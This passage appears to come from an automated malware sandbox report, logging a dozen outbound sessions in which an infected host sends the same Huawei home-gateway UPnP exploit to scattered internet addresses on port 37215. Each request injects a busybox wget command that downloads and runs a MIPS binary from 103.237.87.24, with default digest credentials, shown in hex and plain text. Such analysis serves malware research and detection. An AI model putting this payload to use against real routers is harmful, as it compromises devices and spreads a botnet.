69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  586192.168.2.1334568197.49.80.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.127604008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  587192.168.2.1355720197.74.107.18637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.128071070 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  588192.168.2.135273652.22.88.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.128078938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  589192.168.2.1345604197.58.39.10237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.128109932 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  590192.168.2.135524241.179.216.11337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.128113031 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  591192.168.2.1336016157.12.70.14937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.128117085 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  592192.168.2.135581441.224.73.18937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.128175974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  593192.168.2.1339100157.223.161.4637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.128205061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  594192.168.2.1349594157.10.36.5837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.128247023 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  595192.168.2.135280641.2.242.24437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.128247976 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  596192.168.2.13480184.8.242.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.128269911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
